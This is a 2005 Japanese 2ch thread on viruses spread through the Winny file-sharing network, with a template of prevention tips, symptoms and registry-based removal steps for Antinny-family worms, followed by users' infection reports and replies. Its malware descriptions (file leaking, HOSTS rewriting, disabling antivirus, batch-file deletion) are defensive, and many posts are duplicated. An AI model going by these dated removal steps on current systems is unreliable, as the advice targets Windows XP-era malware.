※アプリケーションのインストール時に弊害が起こることもあるので注意。
911 :[名無し]さん(bin+cue).rar:05/01/29 15:28:57 ID:DYLrTfHq0
■感染しないための注意2 〜普段からの注意〜
・大事なデータはこまめにCDなどの外部メディアにバックアップを取る。
・落としたファイルは必ずウイルススキャンする。
・指定外の場所へ解凍される脆弱性がある解凍ソフトがあるので対応済のソフトを使う。
ttp://www.forest.impress.co.jp/article/2004/07/30/arcsecurity.html
・解凍ソフトはWinRARなど、解凍前に中身を確認できるアーカイバを使う。
・CDイメージはAutorunを切ってからマウントし、更に実行ファイル(setup.exe等)をウイルススキャンする。
★exeファイルの実行は自己責任。実行するならウイルス対策を怠らないこと。
また、exeファイルに関してはアンチウイルスソフトを当てにしすぎないこと。
●CD/DVDドライブのAutorunの切り方●
◆Win9x、Meの場合
1.[マイ コンピュータ]-[プロパティ]-[デバイスマネージャ]-[CD-ROM]-[プロパティ]-[設定]を開く
2.オプション項目の「挿入の自動通知」のチェックを外す
◆Win2000、XPの場合
1.[スタート]−[ファイル名を指定して実行]で「regedit」と入力
2.レジストリエディタで、HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom を展開
3.右の「AutoRun」値のデータを0に設定
※設定変更後、必ず再起動すること。再起動しないと有効になりません。
※窓の手などの管理ソフトでも簡単にオフに出来ます。
※DaemonToolsの自動起動とは別です。これをオフにしても自動実行は切れません。
・大事なデータはこまめにCDなどの外部メディアにバックアップを取る。
・落としたファイルは必ずウイルススキャンする。
・指定外の場所へ解凍される脆弱性がある解凍ソフトがあるので対応済のソフトを使う。
ttp://www.forest.impress.co.jp/article/2004/07/30/arcsecurity.html
・解凍ソフトはWinRARなど、解凍前に中身を確認できるアーカイバを使う。
・CDイメージはAutorunを切ってからマウントし、更に実行ファイル(setup.exe等)をウイルススキャンする。
★exeファイルの実行は自己責任。実行するならウイルス対策を怠らないこと。
また、exeファイルに関してはアンチウイルスソフトを当てにしすぎないこと。
●CD/DVDドライブのAutorunの切り方●
◆Win9x、Meの場合
1.[マイ コンピュータ]-[プロパティ]-[デバイスマネージャ]-[CD-ROM]-[プロパティ]-[設定]を開く
2.オプション項目の「挿入の自動通知」のチェックを外す
◆Win2000、XPの場合
1.[スタート]−[ファイル名を指定して実行]で「regedit」と入力
2.レジストリエディタで、HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom を展開
3.右の「AutoRun」値のデータを0に設定
※設定変更後、必ず再起動すること。再起動しないと有効になりません。
※窓の手などの管理ソフトでも簡単にオフに出来ます。
※DaemonToolsの自動起動とは別です。これをオフにしても自動実行は切れません。
912 :[名無し]さん(bin+cue).rar:05/01/29 15:29:28 ID:DYLrTfHq0
★流行種その1
【キンタマ(W32.AntiWinny.K等)】
■感染ルート
・nyあるいはそれ以外の方法でキンタマワームを踏んで感染。
・IEや拡張子「.folder」のバグを利用し、自動実行させ感染。
■主な症状(感染確認方法)
・Upfolder.txtに登録したことのないフォルダが登録される。
・レジストリエディタ(regedit.exe)を開こうとするとメモ帳が開く。
・"C:\Documents and Settings\ユーザー名\Local Settings\Temp"に"ユーザー名.txt"が作成される。
・HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
に名前xxx データC:\Program Files\???\???.exe(???は任意の名前)が登録される。
・スタートアップに該当プログラムが登録される。(msconfigで確認)
■主な活動内容(種類により活動内容は異なる)
・Winnyとは関係なくランダムな時間にデスクトップのスクリーンショットを取る。
・デスクトップ上のファイルをまとめて [キンタマ] 俺のデスクトップ PCのユーザー名[日付](ファイル詰め合わせ).lzh という名前でupフォルダに置く。
・UpFolder.txtを書き換えてファイルを勝手にアップロードする。
・Winnyを接続すると知らない間に勝手にこれらをダウンロードする。
・各exeファイルはそのアイコンの本来の動作も同時に行う。
(例えばjpgアイコンに偽装したexeを起動すると、ワームが実行されると共に画像も表示されるため気づきにくい)
■駆除方法
・Winnyをフォルダごと削除、そしてWinnyを再び入れ直す。
・HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Runの怪しい値を削除する。
・C:\Program Files\???\???.exeを削除、 スタートアップからも該当プログラム削除。
■予防
・なるべく関わらない。推奨無視ワード「キンタマ」「デスクトップ」
■まとめサイト
ttp://myui.s53.xrea.com/kin/index.html
■挙動の似たウイルス【苺きんたま(Trojan.Upchan)】
ttp://www.geocities.jp/ichigo_kintama/
【キンタマ(W32.AntiWinny.K等)】
■感染ルート
・nyあるいはそれ以外の方法でキンタマワームを踏んで感染。
・IEや拡張子「.folder」のバグを利用し、自動実行させ感染。
■主な症状(感染確認方法)
・Upfolder.txtに登録したことのないフォルダが登録される。
・レジストリエディタ(regedit.exe)を開こうとするとメモ帳が開く。
・"C:\Documents and Settings\ユーザー名\Local Settings\Temp"に"ユーザー名.txt"が作成される。
・HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
に名前xxx データC:\Program Files\???\???.exe(???は任意の名前)が登録される。
・スタートアップに該当プログラムが登録される。(msconfigで確認)
■主な活動内容(種類により活動内容は異なる)
・Winnyとは関係なくランダムな時間にデスクトップのスクリーンショットを取る。
・デスクトップ上のファイルをまとめて [キンタマ] 俺のデスクトップ PCのユーザー名[日付](ファイル詰め合わせ).lzh という名前でupフォルダに置く。
・UpFolder.txtを書き換えてファイルを勝手にアップロードする。
・Winnyを接続すると知らない間に勝手にこれらをダウンロードする。
・各exeファイルはそのアイコンの本来の動作も同時に行う。
(例えばjpgアイコンに偽装したexeを起動すると、ワームが実行されると共に画像も表示されるため気づきにくい)
■駆除方法
・Winnyをフォルダごと削除、そしてWinnyを再び入れ直す。
・HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Runの怪しい値を削除する。
・C:\Program Files\???\???.exeを削除、 スタートアップからも該当プログラム削除。
■予防
・なるべく関わらない。推奨無視ワード「キンタマ」「デスクトップ」
■まとめサイト
ttp://myui.s53.xrea.com/kin/index.html
■挙動の似たウイルス【苺きんたま(Trojan.Upchan)】
ttp://www.geocities.jp/ichigo_kintama/
913 :[名無し]さん(bin+cue).rar:05/01/29 15:30:04 ID:DYLrTfHq0
★流行種その2
【Antinny.ms(仮称)】
Antinny.Bの亜種? サイズ 1.26MB 開発名 SilentToker Delphi製
ファイルバージョン5.1.3125.1093 製品バージョン6.00.1800.1007
■主な症状(感染確認方法)
・Windowsフォルダにsvchost.exeを作成。(無い場合もあり)
※Systemフォルダにあるsvchost.exeは問題ありません。
・UpFolder.txtにBBSという名前でダウンフォルダを追加。
・アップ(ダウン?)フォルダのZIP、LZH、RAR(?)に感染。感染の際にアイコンを自ら変更する。
・アンチウイルスソフト(ノートン、バスター)の常駐を無効にする。
・親と子があり、いずれもSystemフォルダに作成される。子を消しても、再起動すると親が子を再度作成する。
親はms???.exe(282k)、子はms???.exe(248k)。
・親はサービスに登録される。
・子はHOSTSを書き換えてWindowsUpdateやSymantecなどに接続不可にする。
・親と子はノートンでトロイとして検出される。バスターは未対応?
■活動内容
・毎月第一月曜日に発動。行動内容は不明。
■駆除方法
1.親のファイル名が含まれるレジストリキーを削除。
Win2k、XPの場合HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ 内にある。
(Win9x、MEの場合は不明)
2.セーフモードで再起動し、ファイルを親子ともども削除。
3.HOSTSファイルを開き、宛先が0.0.0.0の行を全部削除。
HOSTSファイルは \Windows\System32\Drivers\etc\Hosts をメモ帳などで開く。
4.NyのUpフォルダ設定を元に戻す。
5.ノートンやバスター等のワクチンソフトを再インストール。
バスターはPCCTool.exeを使えば再インストールせずに済む。
【Antinny.ms(仮称)】
Antinny.Bの亜種? サイズ 1.26MB 開発名 SilentToker Delphi製
ファイルバージョン5.1.3125.1093 製品バージョン6.00.1800.1007
■主な症状(感染確認方法)
・Windowsフォルダにsvchost.exeを作成。(無い場合もあり)
※Systemフォルダにあるsvchost.exeは問題ありません。
・UpFolder.txtにBBSという名前でダウンフォルダを追加。
・アップ(ダウン?)フォルダのZIP、LZH、RAR(?)に感染。感染の際にアイコンを自ら変更する。
・アンチウイルスソフト(ノートン、バスター)の常駐を無効にする。
・親と子があり、いずれもSystemフォルダに作成される。子を消しても、再起動すると親が子を再度作成する。
親はms???.exe(282k)、子はms???.exe(248k)。
・親はサービスに登録される。
・子はHOSTSを書き換えてWindowsUpdateやSymantecなどに接続不可にする。
・親と子はノートンでトロイとして検出される。バスターは未対応?
■活動内容
・毎月第一月曜日に発動。行動内容は不明。
■駆除方法
1.親のファイル名が含まれるレジストリキーを削除。
Win2k、XPの場合HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ 内にある。
(Win9x、MEの場合は不明)
2.セーフモードで再起動し、ファイルを親子ともども削除。
3.HOSTSファイルを開き、宛先が0.0.0.0の行を全部削除。
HOSTSファイルは \Windows\System32\Drivers\etc\Hosts をメモ帳などで開く。
4.NyのUpフォルダ設定を元に戻す。
5.ノートンやバスター等のワクチンソフトを再インストール。
バスターはPCCTool.exeを使えば再インストールせずに済む。
914 :[名無し]さん(bin+cue).rar:05/01/29 15:30:35 ID:DYLrTfHq0
★流行種その3
【Autorun+batを利用したウイルス】
5種類以上の亜種がある。
■感染ルート
・主にエロゲのイメージファイルをマウントした時やSetupを実行した時に感染。
■主な活動内容(種類により活動は異なる)
・deltree、del、rmコマンドでファイル削除。
・bug.exeで気をそらす。
・reg deleteコマンドでレジストリ全削除。
・スタートアップに自身を登録し、再起動する毎に活動する。
・レジストリのRunやRunOnceに自身を登録し、再起動する毎に活動する。
・システムの復元の無効化。
・Windowsファイル保護の無効化。
・使用者名・企業名変更。
・レジストリエディタ本体及びdllcacheやi386フォルダ内のバックアップの削除。
(削除したファイルと同名のフォルダを作成する)
・強制再起動
・html(ACCS・JASRACへの田代砲)の起動をatコマンドでスケジュールする。
・壁紙をエロCGに変更(画面のプロパティでの修正は不可)。
■駆除方法(種類により対処法は異なる)
・batファイルに書かれたDOSコマンドを読んで、加えられた変更を元に戻す。
■対策
・batファイルを不用意に実行しない。
【Autorun+batを利用したウイルス】
5種類以上の亜種がある。
■感染ルート
・主にエロゲのイメージファイルをマウントした時やSetupを実行した時に感染。
■主な活動内容(種類により活動は異なる)
・deltree、del、rmコマンドでファイル削除。
・bug.exeで気をそらす。
・reg deleteコマンドでレジストリ全削除。
・スタートアップに自身を登録し、再起動する毎に活動する。
・レジストリのRunやRunOnceに自身を登録し、再起動する毎に活動する。
・システムの復元の無効化。
・Windowsファイル保護の無効化。
・使用者名・企業名変更。
・レジストリエディタ本体及びdllcacheやi386フォルダ内のバックアップの削除。
(削除したファイルと同名のフォルダを作成する)
・強制再起動
・html(ACCS・JASRACへの田代砲)の起動をatコマンドでスケジュールする。
・壁紙をエロCGに変更(画面のプロパティでの修正は不可)。
■駆除方法(種類により対処法は異なる)
・batファイルに書かれたDOSコマンドを読んで、加えられた変更を元に戻す。
■対策
・batファイルを不用意に実行しない。
915 :[名無し]さん(bin+cue).rar:05/01/29 15:31:08 ID:DYLrTfHq0
★流行種その4
【スクリーンセーバー(仮称)】
・サイズは4,553,632Byte、アイコンはフォルダに偽装。
■感染ルート
・感染者が流す圧縮ファイルにある偽装されたウイルス本体から感染する模様。
■主な症状(感染確認方法)
・ny起動すると画面が真っ黒になり、
赤い文字で「winnyで違法なファイルを集めています」と文字が流れる。
・マウス動かすとログオフ画面に切り替わる。
・起動時にアドレス帳が勝手に立ち上がる。
・タスクマネージャが起動できない。
■主な活動内容
・C:\WINNT\Web\Wallpaperのフォルダを開く(意味は不明)。
・C:\WINDOWS\bugfixというフォルダを作り2つの圧縮ファイル作成。
[任意ワード][NullPorce] 俺のアドレス帳&お気に入り ユーザー名.zip
私はユーザー名、Antinnyの作者だ。.zip
・UpFolder.txtに「Path=C:\WINDOWS\bugfix」を追加。
・Winny.exeが置いてあるフォルダに、"NullPorce2MX.exe"(22,528バイト)ができる。
・C:\WINNTにWindowsXPのフォルダに偽装したexeファイルをいくつか作る。
ファイル名はシステムに使用されるものをランダムに使用する模様。
(報告済み:CTFMON.EXE、Exploder.exe、IMEJPMlG8.0.exeなど、どれも45,056バイト)
・レジストリに以下を追加し、起動時の自動実行が設定される。
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
・また以下の値も追加、作用は不明?値はGalaxian Explosion
HKEY_CURRENT_USER\Software\VB and VBA Program Settings\NullPorce2\Attribute
■駆除方法
・C:\WINDOWS\system\にあるwnconfig.txtとアイコンが偽装しているexeを削除。
・C:\WINDOWS\bugfix\の中に生成されてる2つのファイルを削除。
・nyを入れてるフォルダにあるUpFolder.txtを削除。
・レジストリで追加されたキーを削除。
【スクリーンセーバー(仮称)】
・サイズは4,553,632Byte、アイコンはフォルダに偽装。
■感染ルート
・感染者が流す圧縮ファイルにある偽装されたウイルス本体から感染する模様。
■主な症状(感染確認方法)
・ny起動すると画面が真っ黒になり、
赤い文字で「winnyで違法なファイルを集めています」と文字が流れる。
・マウス動かすとログオフ画面に切り替わる。
・起動時にアドレス帳が勝手に立ち上がる。
・タスクマネージャが起動できない。
■主な活動内容
・C:\WINNT\Web\Wallpaperのフォルダを開く(意味は不明)。
・C:\WINDOWS\bugfixというフォルダを作り2つの圧縮ファイル作成。
[任意ワード][NullPorce] 俺のアドレス帳&お気に入り ユーザー名.zip
私はユーザー名、Antinnyの作者だ。.zip
・UpFolder.txtに「Path=C:\WINDOWS\bugfix」を追加。
・Winny.exeが置いてあるフォルダに、"NullPorce2MX.exe"(22,528バイト)ができる。
・C:\WINNTにWindowsXPのフォルダに偽装したexeファイルをいくつか作る。
ファイル名はシステムに使用されるものをランダムに使用する模様。
(報告済み:CTFMON.EXE、Exploder.exe、IMEJPMlG8.0.exeなど、どれも45,056バイト)
・レジストリに以下を追加し、起動時の自動実行が設定される。
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
・また以下の値も追加、作用は不明?値はGalaxian Explosion
HKEY_CURRENT_USER\Software\VB and VBA Program Settings\NullPorce2\Attribute
■駆除方法
・C:\WINDOWS\system\にあるwnconfig.txtとアイコンが偽装しているexeを削除。
・C:\WINDOWS\bugfix\の中に生成されてる2つのファイルを削除。
・nyを入れてるフォルダにあるUpFolder.txtを削除。
・レジストリで追加されたキーを削除。
916 :[名無し]さん(bin+cue).rar:05/01/29 15:31:39 ID:DYLrTfHq0
★流行種その5
【仙台キンタマ(W32.SillyP2P)】
■感染ルート
・主にエロゲのイメージファイルをマウント、Autorunでウイルス発動。
■主な活動内容
・壁紙を勝手に変更する。
・windows\system32の中にexeを作製(svchost32.exe、setup.exe、ごみ箱.exeなど)。
・HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Runに上記exeを追加。
・レジストリエディタをメモ帳で上書き。
・UpFolder.txtにUPフォルダを追加(使用されるトリップはユーザー名の模様)し、
Download.txtにウイルスと思われるスペースつきのexeファイルを追加する。
・winnyのフォルダ内に隠しフォルダでUPフォルダが作られ、
downフォルダ内のファイル一覧のtxt、デスクトップSS、
Favorites、受信トレイ.dbx、送信トレイ.dbx、My Documentsが入れられる。
・Ignore.txtに仙台ギャラクシーエンジェルズを追加するため、自分が晒されてると気づきにくい。
■駆除方法
・windows\system32の中に作製されたexeを削除。
・HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Runに追加されたキー削除。
・UpFolder.txt、Download.txtの問題箇所修正削除。
【仙台スクリーンセーバー】
・仙台キンタマの2次感染を狙ったもの、仙台キンタマが放流する詰合わせに偽装。
・『(ユーザー名が2-3文字の女性名、トリップ無し)に混在の.scr』とスクリーンセーバ偽装。
・ハードディスク内の.doc、.xls、.txt、.jpgなどを収集しnyへ放流する。
・ノートンはAntinny.Gとして緊急対策。
【仙台キンタマ(W32.SillyP2P)】
■感染ルート
・主にエロゲのイメージファイルをマウント、Autorunでウイルス発動。
■主な活動内容
・壁紙を勝手に変更する。
・windows\system32の中にexeを作製(svchost32.exe、setup.exe、ごみ箱.exeなど)。
・HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Runに上記exeを追加。
・レジストリエディタをメモ帳で上書き。
・UpFolder.txtにUPフォルダを追加(使用されるトリップはユーザー名の模様)し、
Download.txtにウイルスと思われるスペースつきのexeファイルを追加する。
・winnyのフォルダ内に隠しフォルダでUPフォルダが作られ、
downフォルダ内のファイル一覧のtxt、デスクトップSS、
Favorites、受信トレイ.dbx、送信トレイ.dbx、My Documentsが入れられる。
・Ignore.txtに仙台ギャラクシーエンジェルズを追加するため、自分が晒されてると気づきにくい。
■駆除方法
・windows\system32の中に作製されたexeを削除。
・HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Runに追加されたキー削除。
・UpFolder.txt、Download.txtの問題箇所修正削除。
【仙台スクリーンセーバー】
・仙台キンタマの2次感染を狙ったもの、仙台キンタマが放流する詰合わせに偽装。
・『(ユーザー名が2-3文字の女性名、トリップ無し)に混在の.scr』とスクリーンセーバ偽装。
・ハードディスク内の.doc、.xls、.txt、.jpgなどを収集しnyへ放流する。
・ノートンはAntinny.Gとして緊急対策。
917 :[名無し]さん(bin+cue).rar:05/01/29 15:32:09 ID:DYLrTfHq0
過去スレ
Part01 http://tmp.2ch.net/test/read.cgi/download/1060003283/
Part02 http://tmp.2ch.net/test/read.cgi/download/1060385909/
Part03 http://tmp.2ch.net/test/read.cgi/download/1060700316/
Part04 http://tmp.2ch.net/test/read.cgi/download/1061551896/
Part05 http://tmp.2ch.net/test/read.cgi/download/1063637671/
Part06 http://tmp2.2ch.net/test/read.cgi/download/1066288327/
Part07 http://tmp2.2ch.net/test/read.cgi/download/1068654569/
Part08 http://tmp2.2ch.net/test/read.cgi/download/1072600676/
Part09 http://tmp2.2ch.net/test/read.cgi/download/1075998916/
Part10 http://tmp2.2ch.net/test/read.cgi/download/1078207953/
Part11 http://tmp2.2ch.net/test/read.cgi/download/1079425731/
Part12 http://tmp2.2ch.net/test/read.cgi/download/1079449665/
Part13 http://tmp2.2ch.net/test/read.cgi/download/1079540824/
Part14 http://tmp2.2ch.net/test/read.cgi/download/1079918577/
Part15 http://tmp2.2ch.net/test/read.cgi/download/1080816795/
Part16 http://tmp2.2ch.net/test/read.cgi/download/1081307106/
Part17 http://tmp2.2ch.net/test/read.cgi/download/1082190076/
Part18 http://tmp2.2ch.net/test/read.cgi/download/1083335282/
Part19 http://tmp3.2ch.net/test/read.cgi/download/1084036887/
Part20 http://tmp3.2ch.net/test/read.cgi/download/1084808432/
Part01 http://tmp.2ch.net/test/read.cgi/download/1060003283/
Part02 http://tmp.2ch.net/test/read.cgi/download/1060385909/
Part03 http://tmp.2ch.net/test/read.cgi/download/1060700316/
Part04 http://tmp.2ch.net/test/read.cgi/download/1061551896/
Part05 http://tmp.2ch.net/test/read.cgi/download/1063637671/
Part06 http://tmp2.2ch.net/test/read.cgi/download/1066288327/
Part07 http://tmp2.2ch.net/test/read.cgi/download/1068654569/
Part08 http://tmp2.2ch.net/test/read.cgi/download/1072600676/
Part09 http://tmp2.2ch.net/test/read.cgi/download/1075998916/
Part10 http://tmp2.2ch.net/test/read.cgi/download/1078207953/
Part11 http://tmp2.2ch.net/test/read.cgi/download/1079425731/
Part12 http://tmp2.2ch.net/test/read.cgi/download/1079449665/
Part13 http://tmp2.2ch.net/test/read.cgi/download/1079540824/
Part14 http://tmp2.2ch.net/test/read.cgi/download/1079918577/
Part15 http://tmp2.2ch.net/test/read.cgi/download/1080816795/
Part16 http://tmp2.2ch.net/test/read.cgi/download/1081307106/
Part17 http://tmp2.2ch.net/test/read.cgi/download/1082190076/
Part18 http://tmp2.2ch.net/test/read.cgi/download/1083335282/
Part19 http://tmp3.2ch.net/test/read.cgi/download/1084036887/
Part20 http://tmp3.2ch.net/test/read.cgi/download/1084808432/
918 :[名無し]さん(bin+cue).rar:05/01/29 15:32:42 ID:DYLrTfHq0
Part21 http://tmp4.2ch.net/test/read.cgi/download/1086794458/
Part22 http://tmp4.2ch.net/test/read.cgi/download/1089460762/
Part23 http://tmp4.2ch.net/test/read.cgi/download/1091063187/
Part24 http://tmp4.2ch.net/test/read.cgi/download/1092058756/
Part25 http://tmp4.2ch.net/test/read.cgi/download/1093270545/
Part26 http://tmp4.2ch.net/test/read.cgi/download/1094872215/
Part27 http://tmp4.2ch.net/test/read.cgi/download/1095939735/
Part28 http://tmp4.2ch.net/test/read.cgi/download/1096694962/
Part29 http://tmp4.2ch.net/test/read.cgi/download/1098962243/
Part30 http://tmp4.2ch.net/test/read.cgi/download/1099709559/
Part31 http://tmp4.2ch.net/test/read.cgi/download/1100072614/
Part32 http://tmp4.2ch.net/test/read.cgi/download/1102892779/
Part22 http://tmp4.2ch.net/test/read.cgi/download/1089460762/
Part23 http://tmp4.2ch.net/test/read.cgi/download/1091063187/
Part24 http://tmp4.2ch.net/test/read.cgi/download/1092058756/
Part25 http://tmp4.2ch.net/test/read.cgi/download/1093270545/
Part26 http://tmp4.2ch.net/test/read.cgi/download/1094872215/
Part27 http://tmp4.2ch.net/test/read.cgi/download/1095939735/
Part28 http://tmp4.2ch.net/test/read.cgi/download/1096694962/
Part29 http://tmp4.2ch.net/test/read.cgi/download/1098962243/
Part30 http://tmp4.2ch.net/test/read.cgi/download/1099709559/
Part31 http://tmp4.2ch.net/test/read.cgi/download/1100072614/
Part32 http://tmp4.2ch.net/test/read.cgi/download/1102892779/
919 :[名無し]さん(bin+cue).rar:05/01/29 15:34:04 ID:DYLrTfHq0
テンプレ多少弄ってみた。
不備とかあったら訂正よろ
不備とかあったら訂正よろ
920 :[名無し]さん(bin+cue).rar:05/01/29 15:59:02 ID:vMHelBHX0
質問テンプレイラネ
921 :[名無し]さん(bin+cue).rar:05/01/29 16:30:19 ID:tTkyNm5i0
アンチウイルスの更新をしてるつもりの奴も多いから
バスターとノーdのオンラインスキャンでの未検出も、最低必須事項にしないと
質問テンプレを報告テンプレに変えちゃえ
バスターとノーdのオンラインスキャンでの未検出も、最低必須事項にしないと
質問テンプレを報告テンプレに変えちゃえ
922 :[名無し]さん(bin+cue).rar:05/01/29 16:46:27 ID:TCKGHm6y0
初質から回されてくるんだし、しょうがないんじゃない?
923 :[名無し]さん(bin+cue).rar:05/01/29 16:53:58 ID:CSjNbZ6s0
質問者は仕方ないとしても、きちんと対応する人がいるのは稀だし、
結局構いたい年頃の初心者が絡むわけで、そうなると
収集つかなくなってスレが機能喪失するって流れだな
結局構いたい年頃の初心者が絡むわけで、そうなると
収集つかなくなってスレが機能喪失するって流れだな
924 :[名無し]さん(bin+cue).rar:05/01/29 17:00:27 ID:xiBPUkbV0
質問者・ウイルス感染者を呼び込まないと、このスレ、成り立たなくね?
925 :[名無し]さん(bin+cue).rar:05/01/29 17:02:40 ID:itHtipTv0
いいこと言った
926 :[名無し]さん(bin+cue).rar:05/01/29 17:09:35 ID:CSjNbZ6s0
Q&Aスレと技術検証スレが別にあるとスマートだけど、
Q&Aの回答側できちんと対応するってのは、有償じゃないと無理だろ
そんなボランティア精神に溢れた技術者がいるわけない
結局、初心者同士が絡んで荒れるしかないんだが
Q&Aの回答側できちんと対応するってのは、有償じゃないと無理だろ
そんなボランティア精神に溢れた技術者がいるわけない
結局、初心者同士が絡んで荒れるしかないんだが
927 :[名無し]さん(bin+cue).rar:05/01/29 18:39:01 ID:OvBiuRZE0
ブラックジャックによろしくの10巻でハードディスクがスッカラカンになった。
形式はzipでそういやトリップ付きだった。
解凍後に偽装アイコンをクリックしたら感染した。
既出だったらスマソ
形式はzipでそういやトリップ付きだった。
解凍後に偽装アイコンをクリックしたら感染した。
既出だったらスマソ
928 :[名無し]さん(bin+cue).rar:05/01/29 19:46:12 ID:rY08XHBV0
スレの1の一番上に「ここでは相当特殊な事例でなければ返答はきません」
とか書いておけば?
とか書いておけば?
929 :[名無し]さん(bin+cue).rar:05/01/29 19:50:25 ID:sysDgczd0
>>907-918
>>907
>・CD・DVDでAutorunを利用してbatファイルを実行
イメージ化ファイルのAutorunを利用したものなので
「CD・DVD」は間違え。
他の変更箇所も改悪かなと言う点あるなぁ。
>>907
>・CD・DVDでAutorunを利用してbatファイルを実行
イメージ化ファイルのAutorunを利用したものなので
「CD・DVD」は間違え。
他の変更箇所も改悪かなと言う点あるなぁ。
930 :[名無し]さん(bin+cue).rar:05/01/29 20:11:05 ID:KkcFNc0Y0
>>927
ウィルススキャンしたんだろうな?
ウィルススキャンしたんだろうな?
931 :[名無し]さん(bin+cue).rar:05/01/29 21:35:33 ID:o50tSFT10
ワームっぽそうなのを片っ端から集めてPandaオンラインスキャンにかけてみた。
メジャーどころ(Hくらいまで)は全て取り除いてくれたがavastフリーでAntinny.B(亜種)、
AVG7フリーでAntinny.Lと判定されたものはパンダさん無反応。
製品版買う気がしない人、割れ物嫌いな律儀な人はパンダする時気をつけてねん。
メジャーどころ(Hくらいまで)は全て取り除いてくれたがavastフリーでAntinny.B(亜種)、
AVG7フリーでAntinny.Lと判定されたものはパンダさん無反応。
製品版買う気がしない人、割れ物嫌いな律儀な人はパンダする時気をつけてねん。
932 :[名無し]さん(bin+cue).rar:05/01/29 21:38:31 ID:Gd/JMsQI0
テンプレいらん
933 :[名無し]さん(bin+cue).rar:05/01/29 21:43:51 ID:FK16L1DB0
いや必要
934 :[名無し]さん(bin+cue).rar:05/01/29 22:38:23 ID:et0xtTGp0
使用OS】 xp
【WindowsUpdateしてるか】 はい
【AntiVirusは】 ノートン2004
【ちゃんとUpdateしてるか】はい
【スキャンした結果】 tropian.Nullpos ってのに感染しました
【オンラインスキャンしたならその結果は】
【Winnyのバージョン】7.1b
【Winny歴、総DL量は】 一ヶ月前 30こくらい
【テンプレを読んだか】 よんだけどあまり理解できず
【テンプレにある対策を実行したか】 やらなきゃなおらないですかね。
【症状か具体的に、分かる限りすべて書く】 DL後開く前にノートンがウイルス感染しましたと
【何をしたらそんなことになったのか】こち亀2005-9を落としたら
【これまでにとった措置】 テンプレよんでがんばってる
教えてください。
【WindowsUpdateしてるか】 はい
【AntiVirusは】 ノートン2004
【ちゃんとUpdateしてるか】はい
【スキャンした結果】 tropian.Nullpos ってのに感染しました
【オンラインスキャンしたならその結果は】
【Winnyのバージョン】7.1b
【Winny歴、総DL量は】 一ヶ月前 30こくらい
【テンプレを読んだか】 よんだけどあまり理解できず
【テンプレにある対策を実行したか】 やらなきゃなおらないですかね。
【症状か具体的に、分かる限りすべて書く】 DL後開く前にノートンがウイルス感染しましたと
【何をしたらそんなことになったのか】こち亀2005-9を落としたら
【これまでにとった措置】 テンプレよんでがんばってる
教えてください。
935 :[名無し]さん(bin+cue).rar:05/01/29 22:43:51 ID:Q25YWO7X0
>>934
バカ?
バカ?
936 :[名無し]さん(bin+cue).rar:05/01/29 22:44:55 ID:QFAmQkzc0
感染してねんじゃね。検疫されてっか確認したのか?
937 :[名無し]さん(bin+cue).rar:05/01/29 22:52:19 ID:s0IUD2kw0
それは感染でなく発見だな
938 :[名無し]さん(bin+cue).rar:05/01/29 22:52:40 ID:QL5RpAmx0
>927
ny無視リストに登録
ny無視リストに登録
ごめん、馬鹿です。発見でしたか。でも、コンピューターはまだ感染していますとでたのですが@@;
とりあえずそのファイルは削除してみましたが問題ないんですか?
pc初心者でよくわからないもので申し訳ないorz
とりあえずそのファイルは削除してみましたが問題ないんですか?
pc初心者でよくわからないもので申し訳ないorz
940 :[名無し]さん(bin+cue).rar:05/01/29 23:13:01 ID:YRTHPRGA0
引き続きテンプレ読んでがんばれ
>>899
ダメだ・・・スタートアップ、サービス両方切っても改善されん・・・
こころあたる事といえば・・winnyのシステムから見るキャッシュ保持数と、
実際のキャッシュフォルダの大きさが全然違うことと、
Documents and settings開くときなぜか、ネットパスポートにログインって出てくることぐらいだ。
再インスコだけは免れたい・・・orz
ダメだ・・・スタートアップ、サービス両方切っても改善されん・・・
こころあたる事といえば・・winnyのシステムから見るキャッシュ保持数と、
実際のキャッシュフォルダの大きさが全然違うことと、
Documents and settings開くときなぜか、ネットパスポートにログインって出てくることぐらいだ。
再インスコだけは免れたい・・・orz
942 :[名無し]さん(bin+cue).rar:05/01/29 23:23:08 ID:xH1nFAPD0
943 :[名無し]さん(bin+cue).rar:05/01/29 23:23:23 ID:KkcFNc0Y0
>>941
そんな再インスコいやなんなら普段からドライブごとバックアップとっとけよ
そんな再インスコいやなんなら普段からドライブごとバックアップとっとけよ
がんばってみます、ところで超超初歩的な質問ですがウイルス発見してもそのファイルを開かなければ絶対平気なんですよね?一応いまコンピューターをスキャンしてるんですけどそこで検出されなければまったく問題ないですよね???
うざいだろうけどこれだけ教えてくださいOTZZZ
うざいだろうけどこれだけ教えてくださいOTZZZ
945 :[名無し]さん(bin+cue).rar:05/01/29 23:32:09 ID:xH1nFAPD0
>>941
ガンバレ
>>944
開かねば感染しない←これは「絶対」ではないです
むしろアンチウィルスソフトに頼りきってる状態だとそのうちHDD真っ白になるでしょう。
今回のは大丈夫だとハンコを押しましたが、自分なりに勉強してからP2Pは使用したほうがいいかと
ガンバレ
>>944
開かねば感染しない←これは「絶対」ではないです
むしろアンチウィルスソフトに頼りきってる状態だとそのうちHDD真っ白になるでしょう。
今回のは大丈夫だとハンコを押しましたが、自分なりに勉強してからP2Pは使用したほうがいいかと
946 :[名無し]さん(bin+cue).rar:05/01/29 23:33:23 ID:k4selQRv0
一度感染するとノートンとかも書き換えられて自分(ウイルス)が関知できないようにしてるので注意
947 :[名無し]さん(bin+cue).rar:05/01/29 23:37:49 ID:cJ3uBqqv0
945さんはじめ、みなさんありがとうございますm(__)mおっしゃるとおりで。とりあえず安全なもの意外落とさないようにしますorz
